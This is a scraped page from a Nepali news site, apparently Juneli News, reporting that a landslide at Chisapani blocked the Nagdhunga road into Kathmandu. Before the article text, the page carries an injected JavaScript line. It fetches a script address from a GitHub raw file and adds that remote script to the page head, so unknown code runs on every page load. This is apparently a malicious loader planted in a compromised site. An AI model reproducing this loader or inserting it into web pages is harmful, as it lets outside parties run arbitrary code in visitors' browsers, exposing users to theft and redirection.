;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौँ प्रवेश गर्ने मुख्य नाका नागढुंगा सडक बिहानैदेखि अवरूद्ध – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • काठमाडौँ प्रवेश गर्ने मुख्य नाका नागढुंगा सडक बिहानैदेखि अवरूद्ध
Breaking News

काठमाडौँ प्रवेश गर्ने मुख्य नाका नागढुंगा सडक बिहानैदेखि अवरूद्ध

जुनेली न्यूज, काठमाण्डौ | लगातार बर्षाका कारण देशका विभिन्न ठाउमा सडक अबरुध भएको छ | चिसापानी भन्ने ठाउमा पहिरो जादा काठमाडौँ प्रवेश गर्ने मुख्य नाका नागढुंगा सडक बिहानैदेखि अवरूद्ध भएको छ । नागढुंगाबाट झण्डै पाँचसय मिटर तल पहिरो खस्दा बिहान साढे पाँच बजेदेखि सडक अवरुद्ध भएको हो ।

नागढुंगा प्रहरीकाअनुसार पहिरोले सडक दुईतर्फी नै पूर्णरुपमा अवरुद्ध भएको छ । सडक अवरुद्ध हुँदा सवारी साधनको लामो लाइन लागेको छ । पहिरो पन्छाउन केहीबेरअघिबाट डोजर परिचालन गरिएको छ । सडक सुचारु हुन कम्तिमा पनि दुई घण्टा लाग्ने प्रहरीले जनाएको छ ।

यसअघि आइतबार बिहानदेखि दिउँसो एक बजेसम्म अवरुद्ध भएको सडक पहिरो पन्छाएपछि सञ्चालनमा आएको थियो । हिजो पहिरो गएकै ठाउँमा आज बिहान पुनः पहिरो गएको हो ।

 

फेसबुक प्रतिक्रियाहरु